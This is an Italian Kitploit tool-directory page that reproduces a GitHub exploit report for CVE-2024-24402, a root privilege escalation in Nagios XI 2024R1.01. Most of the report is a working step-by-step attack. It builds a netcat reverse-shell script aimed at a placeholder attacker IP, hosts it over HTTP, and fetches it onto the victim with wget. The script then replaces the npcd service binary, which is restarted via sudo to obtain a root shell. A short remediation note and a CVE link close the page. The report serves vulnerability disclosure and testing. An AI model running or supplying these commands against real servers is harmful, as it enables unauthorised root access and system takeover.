Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-24402 — Escalation dei privilegi in Nagios 2024R1.01 | Kitploit
Strumenti/GitHubGitHub/mawk0235/cve-2024-24402
Escalation di PrivilegiAnalisi delle VulnerabilitàExploitPost-ExploitPenetration TestingRed Teaming
GitHubmawk0235/cve-2024-24402

CVE-2024-24402

Escalation dei privilegi in Nagios 2024R1.01

Vedi Repository
42 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Rapporto di Vulnerabilità

CVE Scoperto da: Jarod Jaslow (MAWK)

Dettagli della Vulnerabilità:

  • Endpoint: Nagios XI Versione 2024R1.01
  • Tipo di Vulnerabilità: Escalation dei Privilegi dall'Utente "NAGIOS"
  • Risultato dello Sfruttamento: Accesso root completo al sistema target

Passaggi per Riprodurre:

1. Creare una Nuova Istanza di Nagios XI Versione 2024R1.01:

  • Scaricare il file OVA di Nagios XI da: https://assets.nagios.com/downloads/nagiosxi/2024/ovf/nagiosxi-2024R1.0.1-64.ova
  • Distribuire l'OVA per creare una nuova istanza. -Utilizzando il mio report precedente ottenere RCE sul server

2. Sfruttare l'Escalation dei Privilegi:

  • Come utente "NAGIOS", creare un file sulla macchina attaccante con il seguente contenuto:

    root@kitploit:~
    #!/bin/bash
    nc -e /bin/bash <Attacker IP> 4445
    

Pasted image 20240118113554

  • Ospitare il file sulla macchina attaccante tramite un server HTTP Python:

    root@kitploit:~
    python3 -m http.server 8000
    

Pasted image 20240118173813

  • Avviare un server di ascolto Netcat (NC) sulla macchina attaccante:

    root@kitploit:~
    nc -nlvp 4445
    

Pasted image 20240118173831

3. Eseguire lo Sfruttamento sul Computer Vittima:

  • Recuperare il file dalla macchina attaccante:

    root@kitploit:~
    wget http://<Attacker IP>:8000/npcd
    

Pasted image 20240118173846

  • Eseguire i seguenti comandi per escalare i privilegi e ricevere una connessione come root:

    root@kitploit:~
    sudo /usr/local/nagiosxi/scripts/manage_services.sh stop npcd
    cp npcd /usr/local/nagios/bin/npcd
    sudo /usr/local/nagiosxi/scripts/manage_services.sh start npcd
    

Pasted image 20240118173857

Pasted image 20240118173915

Raccomandazione:

Si raccomanda di limitare la capacità dell'utente "NAGIOS" di scrivere negli eseguibili dei servizi Nagios che vengono eseguiti come root. Ciò può essere ottenuto implementando permessi dei file e controlli di accesso più restrittivi per le directory e i file pertinenti associati ai servizi Nagios.

Questo dovrebbe essere risolto nelle nuove versioni

CVE:

https://cve.mitre.org/cgi-bin/cvename.cgi?name=2024-24402

Scarica lo strumento